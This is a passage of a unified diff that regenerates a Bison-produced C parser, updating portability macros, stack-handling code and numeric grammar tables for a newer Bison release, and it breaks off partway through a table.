defined YYSIZE_T && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# elif defined __STDC_VERSION__ && 199901 <= __STDC_VERSION__ + # include <stddef.h> /* INFRINGES ON USER NAME SPACE */ + # define YYSIZE_T size_t + # else +-# define YYSIZE_T unsigned int ++# define YYSIZE_T unsigned + # endif + #endif + +-#define YYSIZE_MAXIMUM ((YYSIZE_T) -1) ++#define YYSIZE_MAXIMUM \ ++ YY_CAST (YYPTRDIFF_T, \ ++ (YYPTRDIFF_MAXIMUM < YY_CAST (YYSIZE_T, -1) \ ++ ? YYPTRDIFF_MAXIMUM \ ++ : YY_CAST (YYSIZE_T, -1))) ++ ++#define YYSIZEOF(X) YY_CAST (YYPTRDIFF_T, sizeof (X)) ++ ++ ++/* Stored state numbers (used for stacks). */ ++typedef yytype_int16 yy_state_t; ++ ++/* State numbers in computations. */ ++typedef int yy_state_fast_t; + + #ifndef YY_ + # if defined YYENABLE_NLS && YYENABLE_NLS + # if ENABLE_NLS + # include <libintl.h> /* INFRINGES ON USER NAME SPACE */ +-# define YY_(msgid) dgettext ("bison-runtime", msgid) ++# define YY_(Msgid) dgettext ("bison-runtime", Msgid) + # endif + # endif + # ifndef YY_ +-# define YY_(msgid) msgid ++# define YY_(Msgid) Msgid ++# endif ++#endif ++ ++ ++#ifndef YY_ATTRIBUTE_PURE ++# if defined __GNUC__ && 2 < __GNUC__ + (96 <= __GNUC_MINOR__) ++# define YY_ATTRIBUTE_PURE __attribute__ ((__pure__)) ++# else ++# define YY_ATTRIBUTE_PURE ++# endif ++#endif ++ ++#ifndef YY_ATTRIBUTE_UNUSED ++# if defined __GNUC__ && 2 < __GNUC__ + (7 <= __GNUC_MINOR__) ++# define YY_ATTRIBUTE_UNUSED __attribute__ ((__unused__)) ++# else ++# define YY_ATTRIBUTE_UNUSED + # endif + #endif + + /* Suppress unused-variable warnings by "using" E. */ + #if ! defined lint || defined __GNUC__ +-# define YYUSE(e) ((void) (e)) ++# define YY_USE(E) ((void) (E)) + #else +-# define YYUSE(e) /* empty */ ++# define YY_USE(E) /* empty */ + #endif + +-/* Identity function, used to suppress warnings about constant conditions. 
*/ +-#ifndef lint +-# define YYID(n) (n) +-#else +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static int +-YYID (int i) ++/* Suppress an incorrect diagnostic about yylval being uninitialized. */ ++#if defined __GNUC__ && ! defined __ICC && 406 <= __GNUC__ * 100 + __GNUC_MINOR__ ++# if __GNUC__ * 100 + __GNUC_MINOR__ < 407 ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuninitialized\"") ++# else ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuninitialized\"") \ ++ _Pragma ("GCC diagnostic ignored \"-Wmaybe-uninitialized\"") ++# endif ++# define YY_IGNORE_MAYBE_UNINITIALIZED_END \ ++ _Pragma ("GCC diagnostic pop") + #else +-static int +-YYID (i) +- int i; ++# define YY_INITIAL_VALUE(Value) Value + #endif +-{ +- return i; +-} ++#ifndef YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++# define YY_IGNORE_MAYBE_UNINITIALIZED_END ++#endif ++#ifndef YY_INITIAL_VALUE ++# define YY_INITIAL_VALUE(Value) /* Nothing. */ ++#endif ++ ++#if defined __cplusplus && defined __GNUC__ && ! defined __ICC && 6 <= __GNUC__ ++# define YY_IGNORE_USELESS_CAST_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuseless-cast\"") ++# define YY_IGNORE_USELESS_CAST_END \ ++ _Pragma ("GCC diagnostic pop") + #endif ++#ifndef YY_IGNORE_USELESS_CAST_BEGIN ++# define YY_IGNORE_USELESS_CAST_BEGIN ++# define YY_IGNORE_USELESS_CAST_END ++#endif ++ ++ ++#define YY_ASSERT(E) ((void) (0 && (E))) + +-#if ! defined yyoverflow || YYERROR_VERBOSE ++#if !defined yyoverflow + + /* The parser invokes alloca or malloc; define the necessary symbols. */ + +@@ -738,11 +922,11 @@ YYID (i) + # define alloca _alloca + # else + # define YYSTACK_ALLOC alloca +-# if ! defined _ALLOCA_H && ! 
defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined _ALLOCA_H && ! defined EXIT_SUCCESS + # include <stdlib.h> /* INFRINGES ON USER NAME SPACE */ +-# ifndef _STDLIB_H +-# define _STDLIB_H 1 ++ /* Use EXIT_SUCCESS as a witness for stdlib.h. */ ++# ifndef EXIT_SUCCESS ++# define EXIT_SUCCESS 0 + # endif + # endif + # endif +@@ -750,8 +934,8 @@ YYID (i) + # endif + + # ifdef YYSTACK_ALLOC +- /* Pacify GCC's `empty if-body' warning. */ +-# define YYSTACK_FREE(Ptr) do { /* empty */; } while (YYID (0)) ++ /* Pacify GCC's 'empty if-body' warning. */ ++# define YYSTACK_FREE(Ptr) do { /* empty */; } while (0) + # ifndef YYSTACK_ALLOC_MAXIMUM + /* The OS might guarantee only one guard page at the bottom of the stack, + and a page size can be as small as 4096 bytes. So we cannot safely +@@ -765,125 +949,131 @@ YYID (i) + # ifndef YYSTACK_ALLOC_MAXIMUM + # define YYSTACK_ALLOC_MAXIMUM YYSIZE_MAXIMUM + # endif +-# if (defined __cplusplus && ! defined _STDLIB_H \ ++# if (defined __cplusplus && ! defined EXIT_SUCCESS \ + && ! ((defined YYMALLOC || defined malloc) \ +- && (defined YYFREE || defined free))) ++ && (defined YYFREE || defined free))) + # include <stdlib.h> /* INFRINGES ON USER NAME SPACE */ +-# ifndef _STDLIB_H +-# define _STDLIB_H 1 ++# ifndef EXIT_SUCCESS ++# define EXIT_SUCCESS 0 + # endif + # endif + # ifndef YYMALLOC + # define YYMALLOC malloc +-# if ! defined malloc && ! defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined malloc && ! defined EXIT_SUCCESS + void *malloc (YYSIZE_T); /* INFRINGES ON USER NAME SPACE */ + # endif + # endif + # ifndef YYFREE + # define YYFREE free +-# if ! defined free && ! defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined free && ! 
defined EXIT_SUCCESS + void free (void *); /* INFRINGES ON USER NAME SPACE */ + # endif + # endif + # endif +-#endif /* ! defined yyoverflow || YYERROR_VERBOSE */ +- ++#endif /* !defined yyoverflow */ + + #if (! defined yyoverflow \ + && (! defined __cplusplus \ +- || (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL))) ++ || (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL))) + + /* A type that is properly aligned for any stack member. */ + union yyalloc + { +- yytype_int16 yyss; +- YYSTYPE yyvs; +- }; ++ yy_state_t yyss_alloc; ++ YYSTYPE yyvs_alloc; ++}; + + /* The size of the maximum gap between one aligned stack and the next. */ +-# define YYSTACK_GAP_MAXIMUM (sizeof (union yyalloc) - 1) ++# define YYSTACK_GAP_MAXIMUM (YYSIZEOF (union yyalloc) - 1) + + /* The size of an array large to enough to hold all stacks, each with + N elements. */ + # define YYSTACK_BYTES(N) \ +- ((N) * (sizeof (yytype_int16) + sizeof (YYSTYPE)) \ ++ ((N) * (YYSIZEOF (yy_state_t) + YYSIZEOF (YYSTYPE)) \ + + YYSTACK_GAP_MAXIMUM) + +-/* Copy COUNT objects from FROM to TO. The source and destination do +- not overlap. */ +-# ifndef YYCOPY +-# if defined __GNUC__ && 1 < __GNUC__ +-# define YYCOPY(To, From, Count) \ +- __builtin_memcpy (To, From, (Count) * sizeof (*(From))) +-# else +-# define YYCOPY(To, From, Count) \ +- do \ +- { \ +- YYSIZE_T yyi; \ +- for (yyi = 0; yyi < (Count); yyi++) \ +- (To)[yyi] = (From)[yyi]; \ +- } \ +- while (YYID (0)) +-# endif +-# endif ++# define YYCOPY_NEEDED 1 + + /* Relocate STACK from its old location to the new one. The + local variables YYSIZE and YYSTACKSIZE give the old and new number of + elements in the stack, and YYPTR gives the new location of the + stack. Advance YYPTR to a properly aligned location for the next + stack. 
*/ +-# define YYSTACK_RELOCATE(Stack) \ +- do \ +- { \ +- YYSIZE_T yynewbytes; \ +- YYCOPY (&yyptr->Stack, Stack, yysize); \ +- Stack = &yyptr->Stack; \ +- yynewbytes = yystacksize * sizeof (*Stack) + YYSTACK_GAP_MAXIMUM; \ +- yyptr += yynewbytes / sizeof (*yyptr); \ +- } \ +- while (YYID (0)) ++# define YYSTACK_RELOCATE(Stack_alloc, Stack) \ ++ do \ ++ { \ ++ YYPTRDIFF_T yynewbytes; \ ++ YYCOPY (&yyptr->Stack_alloc, Stack, yysize); \ ++ Stack = &yyptr->Stack_alloc; \ ++ yynewbytes = yystacksize * YYSIZEOF (*Stack) + YYSTACK_GAP_MAXIMUM; \ ++ yyptr += yynewbytes / YYSIZEOF (*yyptr); \ ++ } \ ++ while (0) + + #endif + ++#if defined YYCOPY_NEEDED && YYCOPY_NEEDED ++/* Copy COUNT objects from SRC to DST. The source and destination do ++ not overlap. */ ++# ifndef YYCOPY ++# if defined __GNUC__ && 1 < __GNUC__ ++# define YYCOPY(Dst, Src, Count) \ ++ __builtin_memcpy (Dst, Src, YY_CAST (YYSIZE_T, (Count)) * sizeof (*(Src))) ++# else ++# define YYCOPY(Dst, Src, Count) \ ++ do \ ++ { \ ++ YYPTRDIFF_T yyi; \ ++ for (yyi = 0; yyi < (Count); yyi++) \ ++ (Dst)[yyi] = (Src)[yyi]; \ ++ } \ ++ while (0) ++# endif ++# endif ++#endif /* !YYCOPY_NEEDED */ ++ + /* YYFINAL -- State number of the termination state. */ + #define YYFINAL 4 + /* YYLAST -- Last index in YYTABLE. */ +-#define YYLAST 1630 ++#define YYLAST 1669 + + /* YYNTOKENS -- Number of terminals. */ +-#define YYNTOKENS 174 ++#define YYNTOKENS 175 + /* YYNNTS -- Number of nonterminals. */ + #define YYNNTS 255 + /* YYNRULES -- Number of rules. */ +-#define YYNRULES 597 +-/* YYNRULES -- Number of states. */ +-#define YYNSTATES 1047 +- +-/* YYTRANSLATE(YYLEX) -- Bison symbol number corresponding to YYLEX. */ +-#define YYUNDEFTOK 2 +-#define YYMAXUTOK 406 +- +-#define YYTRANSLATE(YYX) \ +- ((unsigned int) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK) ++#define YYNRULES 598 ++/* YYNSTATES -- Number of states. */ ++#define YYNSTATES 1050 ++ ++/* YYMAXUTOK -- Last valid token kind. 
*/ ++#define YYMAXUTOK 407 ++ ++ ++/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM ++ as returned by yylex, with out-of-bounds checking. */ ++#define YYTRANSLATE(YYX) \ ++ (0 <= (YYX) && (YYX) <= YYMAXUTOK \ ++ ? YY_CAST (yysymbol_kind_t, yytranslate[YYX]) \ ++ : YYSYMBOL_YYUNDEF) + +-/* YYTRANSLATE[YYLEX] -- Bison symbol number corresponding to YYLEX. */ ++/* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM ++ as returned by yylex. */ + static const yytype_uint8 yytranslate[] = + { + 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 159, 2, 2, 2, 172, 164, 2, +- 152, 153, 162, 161, 154, 160, 2, 163, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 169, 158, +- 167, 155, 168, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 160, 2, 2, 2, 173, 165, 2, ++ 153, 154, 163, 162, 155, 161, 2, 164, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 170, 159, ++ 168, 156, 169, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 170, 2, 171, 173, 2, 2, 2, 2, 2, ++ 2, 171, 2, 172, 174, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 156, 165, 157, 166, 2, 2, 2, ++ 2, 2, 2, 157, 166, 158, 167, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +@@ -911,334 +1101,97 @@ static const yytype_uint8 yytranslate[] + 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, + 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, + 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, +- 145, 146, 147, 148, 149, 150, 151 ++ 145, 146, 147, 148, 149, 150, 151, 152 + }; + + #if YYDEBUG +-/* YYPRHS[YYN] -- Index of the first RHS symbol of rule number YYN in +- YYRHS. 
*/ +-static const yytype_uint16 yyprhs[] = +-{ +- 0, 0, 3, 5, 8, 9, 12, 14, 16, 18, +- 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, +- 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, +- 60, 62, 64, 66, 68, 70, 72, 74, 76, 78, +- 80, 82, 84, 86, 88, 90, 92, 94, 96, 98, +- 100, 102, 104, 106, 108, 110, 112, 115, 117, 121, +- 123, 127, 131, 134, 136, 140, 142, 146, 150, 153, +- 155, 159, 161, 165, 169, 172, 174, 178, 180, 184, +- 188, 192, 194, 198, 200, 204, 208, 211, 214, 218, +- 220, 224, 228, 232, 238, 239, 243, 248, 250, 253, +- 255, 257, 259, 261, 264, 265, 271, 272, 279, 284, +- 286, 289, 291, 293, 295, 297, 300, 303, 305, 307, +- 309, 324, 325, 331, 332, 336, 338, 341, 342, 348, +- 350, 353, 355, 358, 360, 364, 366, 370, 374, 375, +- 381, 383, 386, 388, 389, 395, 397, 400, 404, 409, +- 411, 415, 417, 421, 422, 424, 428, 430, 434, 438, +- 442, 446, 450, 453, 455, 459, 461, 465, 469, 472, +- 474, 478, 480, 484, 488, 491, 493, 497, 499, 503, +- 507, 511, 513, 517, 519, 523, 527, 528, 533, 535, +- 538, 540, 542, 544, 548, 550, 554, 556, 560, 564, +- 565, 570, 572, 575, 577, 579, 581, 585, 589, 590, +- 594, 598, 600, 604, 608, 612, 616, 620, 624, 628, +- 632, 636, 640, 641, 646, 648, 651, 653, 655, 657, +- 659, 661, 663, 664, 666, 669, 671, 675, 677, 681, +- 685, 689, 692, 695, 697, 701, 703, 707, 711, 712, +- 715, 716, 719, 720, 723, 726, 729, 732, 735, 738, +- 741, 744, 747, 750, 753, 756, 759, 762, 765, 768, +- 771, 774, 777, 780, 783, 786, 789, 792, 795, 798, +- 801, 804, 807, 810, 814, 816, 820, 824, 828, 829, +- 831, 835, 837, 841, 845, 849, 850, 852, 856, 858, +- 862, 864, 868, 872, 876, 881, 884, 886, 889, 890, +- 900, 901, 903, 905, 906, 908, 909, 911, 912, 914, +- 916, 919, 921, 923, 928, 929, 931, 932, 935, 936, +- 939, 941, 945, 947, 949, 951, 953, 955, 957, 958, +- 960, 962, 964, 966, 968, 970, 974, 975, 979, 982, +- 984, 986, 990, 992, 994, 996, 998, 1003, 1006, 1008, +- 1010, 1012, 1014, 1016, 1018, 1019, 1021, 1025, 1032, 1045, +- 1046, 1047, 1056, 1057, 1061, 
1066, 1067, 1068, 1077, 1078, +- 1081, 1083, 1087, 1090, 1091, 1093, 1095, 1097, 1098, 1102, +- 1103, 1105, 1108, 1110, 1112, 1114, 1116, 1118, 1120, 1122, +- 1124, 1126, 1128, 1130, 1132, 1134, 1136, 1138, 1140, 1142, +- 1144, 1146, 1148, 1150, 1152, 1154, 1156, 1158, 1160, 1162, +- 1164, 1167, 1170, 1173, 1177, 1181, 1185, 1188, 1192, 1196, +- 1198, 1202, 1206, 1210, 1214, 1215, 1220, 1222, 1225, 1227, +- 1229, 1231, 1233, 1235, 1236, 1238, 1239, 1243, 1245, 1257, +- 1258, 1262, 1264, 1276, 1277, 1278, 1285, 1286, 1287, 1295, +- 1313, 1321, 1339, 1356, 1358, 1360, 1362, 1364, 1366, 1368, +- 1370, 1372, 1375, 1378, 1381, 1384, 1387, 1390, 1393, 1396, +- 1399, 1402, 1406, 1410, 1412, 1415, 1418, 1420, 1423, 1426, +- 1429, 1431, 1434, 1435, 1437, 1438, 1440, 1441, 1444, 1445, +- 1449, 1451, 1455, 1457, 1461, 1463, 1469, 1471, 1473, 1474, +- 1477, 1478, 1481, 1482, 1485, 1486, 1489, 1491, 1492, 1494, +- 1498, 1503, 1508, 1513, 1517, 1521, 1528, 1535, 1539, 1542, +- 1543, 1547, 1548, 1552, 1554, 1555, 1559, 1561, 1563, 1565, +- 1566, 1570, 1572, 1581, 1582, 1586, 1588, 1591, 1593, 1595, +- 1598, 1601, 1604, 1609, 1613, 1617, 1618, 1620, 1621, 1625, +- 1628, 1630, 1635, 1638, 1641, 1643, 1645, 1648, 1650, 1652, +- 1655, 1658, 1662, 1664, 1666, 1668, 1671, 1674, 1676, 1678, +- 1680, 1682, 1684, 1686, 1688, 1690, 1692, 1694, 1696, 1698, +- 1700, 1702, 1704, 1708, 1709, 1714, 1715, 1717 +-}; +- +-/* YYRHS -- A `-1'-separated list of the rules' RHS. 
*/ +-static const yytype_int16 yyrhs[] = +-{ +- 175, 0, -1, 176, -1, 175, 176, -1, -1, 177, +- 178, -1, 269, -1, 255, -1, 262, -1, 192, -1, +- 291, -1, 279, -1, 283, -1, 284, -1, 200, -1, +- 230, -1, 222, -1, 226, -1, 239, -1, 180, -1, +- 184, -1, 188, -1, 243, -1, 247, -1, 251, -1, +- 292, -1, 293, -1, 306, -1, 308, -1, 309, -1, +- 310, -1, 311, -1, 312, -1, 313, -1, 314, -1, +- 315, -1, 317, -1, 318, -1, 328, -1, 332, -1, +- 210, -1, 212, -1, 196, -1, 179, -1, 234, -1, +- 238, -1, 218, -1, 358, -1, 364, -1, 361, -1, +- 204, -1, 357, -1, 335, -1, 393, -1, 417, -1, +- 294, -1, 5, 181, -1, 36, -1, 152, 182, 153, +- -1, 183, -1, 182, 154, 183, -1, 138, 155, 36, +- -1, 6, 185, -1, 36, -1, 152, 186, 153, -1, +- 187, -1, 186, 154, 187, -1, 138, 155, 36, -1, +- 7, 189, -1, 36, -1, 152, 190, 153, -1, 191, +- -1, 190, 154, 191, -1, 138, 155, 36, -1, 8, +- 193, -1, 34, -1, 152, 194, 153, -1, 195, -1, +- 194, 154, 195, -1, 138, 155, 34, -1, 9, 197, +- 333, -1, 34, -1, 152, 198, 153, -1, 199, -1, +- 198, 154, 199, -1, 138, 155, 34, -1, 3, 201, +- -1, 34, 107, -1, 152, 202, 153, -1, 203, -1, +- 202, 154, 203, -1, 138, 155, 381, -1, 151, 155, +- 107, -1, 122, 351, 205, 398, 206, -1, -1, 152, +- 351, 153, -1, 156, 207, 157, 158, -1, 208, -1, +- 207, 208, -1, 234, -1, 238, -1, 209, -1, 294, +- -1, 123, 333, -1, -1, 30, 425, 398, 211, 214, +- -1, -1, 363, 30, 425, 398, 213, 214, -1, 156, +- 215, 157, 158, -1, 216, -1, 215, 216, -1, 234, +- -1, 238, -1, 294, -1, 307, -1, 51, 333, -1, +- 52, 333, -1, 303, -1, 335, -1, 217, -1, 97, +- 421, 34, 152, 406, 153, 395, 427, 398, 391, 158, +- 327, 404, 403, -1, -1, 110, 34, 219, 220, 158, +- -1, -1, 156, 221, 157, -1, 179, -1, 221, 179, +- -1, -1, 112, 223, 156, 224, 157, -1, 225, -1, +- 224, 225, -1, 34, -1, 113, 227, -1, 34, -1, +- 152, 228, 153, -1, 229, -1, 228, 154, 229, -1, +- 138, 155, 381, -1, -1, 111, 231, 156, 232, 157, +- -1, 233, -1, 232, 233, -1, 34, -1, -1, 32, +- 152, 235, 237, 153, -1, 34, -1, 159, 34, -1, +- 236, 95, 34, 
-1, 236, 95, 159, 34, -1, 236, +- -1, 339, 160, 339, -1, 33, -1, 114, 240, 398, +- -1, -1, 36, -1, 152, 241, 153, -1, 242, -1, +- 241, 154, 242, -1, 145, 155, 36, -1, 137, 155, +- 36, -1, 143, 155, 36, -1, 144, 155, 36, -1, +- 128, 244, -1, 277, -1, 152, 245, 153, -1, 246, +- -1, 245, 154, 246, -1, 138, 155, 277, -1, 129, +- 248, -1, 277, -1, 152, 249, 153, -1, 250, -1, +- 249, 154, 250, -1, 138, 155, 277, -1, 131, 252, +- -1, 351, -1, 152, 253, 153, -1, 254, -1, 253, +- 154, 254, -1, 138, 155, 351, -1, 62, 256, 259, +- -1, 277, -1, 152, 257, 153, -1, 258, -1, 257, +- 154, 258, -1, 138, 155, 277, -1, -1, 156, 260, +- 157, 158, -1, 261, -1, 260, 261, -1, 234, -1, +- 238, -1, 323, -1, 63, 263, 266, -1, 277, -1, +- 152, 264, 153, -1, 265, -1, 264, 154, 265, -1, +- 138, 155, 277, -1, -1, 156, 267, 157, 158, -1, +- 268, -1, 267, 268, -1, 234, -1, 238, -1, 323, +- -1, 60, 270, 274, -1, 61, 277, 278, -1, -1, +- 277, 271, 278, -1, 152, 272, 153, -1, 273, -1, +- 272, 154, 273, -1, 135, 155, 36, -1, 136, 155, +- 36, -1, 138, 155, 277, -1, 146, 155, 354, -1, +- 147, 155, 354, -1, 148, 155, 354, -1, 149, 155, +- 354, -1, 150, 155, 34, -1, 151, 155, 107, -1, +- -1, 156, 275, 157, 158, -1, 276, -1, 275, 276, +- -1, 234, -1, 238, -1, 319, -1, 323, -1, 34, +- -1, 35, -1, -1, 107, -1, 54, 280, -1, 35, +- -1, 152, 281, 153, -1, 282, -1, 281, 154, 282, +- -1, 138, 155, 35, -1, 139, 155, 354, -1, 55, +- 35, -1, 56, 285, -1, 35, -1, 152, 286, 153, +- -1, 287, -1, 286, 154, 287, -1, 138, 155, 35, +- -1, -1, 17, 333, -1, -1, 18, 333, -1, -1, +- 19, 333, -1, 29, 333, -1, 57, 333, -1, 58, +- 333, -1, 59, 333, -1, 38, 333, -1, 39, 333, +- -1, 40, 333, -1, 41, 333, -1, 42, 333, -1, +- 43, 333, -1, 44, 333, -1, 45, 333, -1, 50, +- 333, -1, 46, 333, -1, 23, 333, -1, 26, 333, +- -1, 27, 333, -1, 20, 333, -1, 21, 333, -1, +- 22, 333, -1, 24, 333, -1, 25, 333, -1, 28, +- 333, -1, 10, 333, -1, 11, 333, -1, 11, 333, +- -1, 13, 333, -1, 14, 333, -1, 4, 320, -1, +- 152, 321, 153, -1, 322, -1, 321, 
154, 322, -1, +- 141, 155, 36, -1, 12, 324, 333, -1, -1, 36, +- -1, 152, 325, 153, -1, 326, -1, 325, 154, 326, +- -1, 132, 155, 36, -1, 143, 155, 36, -1, -1, +- 323, -1, 15, 329, 333, -1, 34, -1, 152, 330, +- 153, -1, 331, -1, 330, 154, 331, -1, 134, 155, +- 34, -1, 140, 155, 107, -1, 16, 35, 338, 333, +- -1, 334, 33, -1, 31, -1, 334, 31, -1, -1, +- 91, 337, 339, 398, 336, 156, 340, 157, 158, -1, +- -1, 64, -1, 65, -1, -1, 35, -1, -1, 34, +- -1, -1, 341, -1, 342, -1, 341, 342, -1, 234, +- -1, 238, -1, 34, 344, 398, 343, -1, -1, 154, +- -1, -1, 155, 349, -1, -1, 155, 346, -1, 349, +- -1, 346, 347, 349, -1, 160, -1, 161, -1, 162, +- -1, 163, -1, 164, -1, 165, -1, -1, 159, -1, +- 166, -1, 160, -1, 161, -1, 162, -1, 164, -1, +- 350, 348, 355, -1, -1, 152, 351, 153, -1, 94, +- 352, -1, 352, -1, 353, -1, 352, 94, 353, -1, +- 34, -1, 116, -1, 117, -1, 351, -1, 425, 152, +- 356, 153, -1, 156, 157, -1, 108, -1, 107, -1, +- 354, -1, 118, -1, 36, -1, 115, -1, -1, 346, +- -1, 356, 154, 346, -1, 109, 421, 34, 398, 158, +- 327, -1, 109, 421, 152, 162, 34, 153, 152, 426, +- 153, 398, 158, 327, -1, -1, -1, 65, 351, 359, +- 367, 398, 360, 371, 158, -1, -1, 363, 362, 364, +- -1, 125, 167, 426, 168, -1, -1, -1, 64, 351, +- 365, 367, 398, 366, 371, 158, -1, -1, 169, 368, +- -1, 369, -1, 368, 154, 369, -1, 370, 351, -1, +- -1, 66, -1, 67, -1, 68, -1, -1, 156, 372, +- 157, -1, -1, 373, -1, 372, 373, -1, 234, -1, +- 238, -1, 218, -1, 358, -1, 364, -1, 361, -1, +- 204, -1, 357, -1, 335, -1, 374, -1, 323, -1, +- 307, -1, 294, -1, 295, -1, 296, -1, 297, -1, +- 298, -1, 299, -1, 300, -1, 301, -1, 302, -1, +- 303, -1, 304, -1, 305, -1, 316, -1, 386, -1, +- 383, -1, 409, -1, 53, 333, -1, 52, 333, -1, +- 51, 333, -1, 66, 382, 169, -1, 67, 382, 169, +- -1, 68, 382, 169, -1, 69, 169, -1, 130, 375, +- 378, -1, 152, 376, 153, -1, 377, -1, 376, 154, +- 377, -1, 133, 155, 34, -1, 138, 155, 381, -1, +- 142, 155, 34, -1, -1, 156, 379, 157, 158, -1, +- 380, -1, 379, 380, -1, 234, -1, 238, -1, 323, +- 
-1, 34, -1, 36, -1, -1, 71, -1, -1, 90, +- 384, 385, -1, 385, -1, 166, 34, 152, 153, 427, +- 397, 398, 158, 404, 403, 405, -1, -1, 124, 387, +- 388, -1, 388, -1, 34, 152, 406, 153, 427, 398, +- 389, 158, 327, 404, 403, -1, -1, -1, 170, 390, +- 152, 406, 153, 171, -1, -1, -1, 170, 392, 421, +- 152, 406, 153, 171, -1, 421, 34, 152, 406, 153, +- 395, 396, 427, 397, 398, 391, 158, 327, 404, 403, +- 405, 402, -1, 421, 119, 155, 152, 421, 153, 158, +- -1, 421, 119, 394, 152, 406, 153, 395, 396, 427, +- 397, 398, 391, 158, 404, 403, 405, 402, -1, 119, +- 421, 152, 406, 153, 395, 396, 427, 397, 398, 391, +- 158, 404, 403, 405, 402, -1, 161, -1, 160, -1, +- 162, -1, 163, -1, 172, -1, 164, -1, 165, -1, +- 173, -1, 167, 167, -1, 168, 168, -1, 161, 155, +- -1, 160, 155, -1, 162, 155, -1, 163, 155, -1, +- 172, 155, -1, 164, 155, -1, 165, 155, -1, 173, +- 155, -1, 167, 167, 155, -1, 168, 168, 155, -1, +- 166, -1, 152, 153, -1, 170, 171, -1, 167, -1, +- 167, 155, -1, 155, 155, -1, 159, 155, -1, 168, +- -1, 168, 155, -1, -1, 96, -1, -1, 126, -1, +- -1, 155, 107, -1, -1, 163, 399, 163, -1, 400, +- -1, 399, 154, 400, -1, 34, -1, 34, 155, 401, +- -1, 277, -1, 34, 169, 278, 160, 278, -1, 36, +- -1, 107, -1, -1, 47, 333, -1, -1, 48, 333, +- -1, -1, 49, 333, -1, -1, 37, 333, -1, 407, +- -1, -1, 408, -1, 407, 154, 408, -1, 98, 339, +- 398, 345, -1, 99, 339, 398, 345, -1, 100, 339, +- 398, 345, -1, 101, 339, 398, -1, 102, 339, 398, +- -1, 103, 152, 406, 153, 339, 398, -1, 104, 152, +- 406, 153, 339, 398, -1, 121, 339, 398, -1, 422, +- 345, -1, -1, 70, 410, 412, -1, -1, 72, 411, +- 412, -1, 412, -1, -1, 97, 413, 414, -1, 414, +- -1, 415, -1, 417, -1, -1, 90, 416, 393, -1, +- 393, -1, 421, 34, 398, 418, 158, 288, 289, 290, +- -1, -1, 156, 419, 157, -1, 420, -1, 419, 420, +- -1, 234, -1, 238, -1, 17, 333, -1, 18, 333, +- -1, 19, 333, -1, 96, 425, 424, 423, -1, 425, +- 424, 423, -1, 421, 339, 398, -1, -1, 164, -1, +- -1, 424, 162, 96, -1, 424, 162, -1, 351, -1, +- 351, 167, 426, 168, -1, 65, 
351, -1, 93, 74, +- -1, 74, -1, 93, -1, 93, 75, -1, 75, -1, +- 76, -1, 93, 76, -1, 76, 76, -1, 93, 76, +- 76, -1, 77, -1, 78, -1, 73, -1, 92, 79, +- -1, 93, 79, -1, 79, -1, 80, -1, 81, -1, +- 82, -1, 83, -1, 84, -1, 85, -1, 86, -1, +- 87, -1, 88, -1, 89, -1, 105, -1, 106, -1, +- 127, -1, 421, -1, 426, 154, 421, -1, -1, 120, +- 152, 428, 153, -1, -1, 351, -1, 428, 154, 351, +- -1 +-}; +- +-/* YYRLINE[YYN] -- source line where rule number YYN was defined. */ +-static const yytype_uint16 yyrline[] = ++/* YYRLINE[YYN] -- Source line where rule number YYN was defined. */ ++static const yytype_int16 yyrline[] = + { +- 0, 574, 574, 575, 578, 578, 597, 598, 599, 600, +- 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, +- 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, +- 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, +- 631, 632, 633, 634, 637, 638, 639, 640, 641, 642, +- 643, 644, 645, 646, 647, 648, 661, 667, 672, 677, +- 678, 688, 695, 701, 706, 711, 712, 722, 729, 738, +- 743, 748, 749, 759, 766, 777, 782, 787, 788, 798, +- 805, 834, 839, 844, 845, 855, 862, 888, 896, 901, +- 902, 913, 919, 927, 974, 978, 1085, 1090, 1091, 1102, +- 1105, 1108, 1122, 1138, 1143, 1143, 1166, 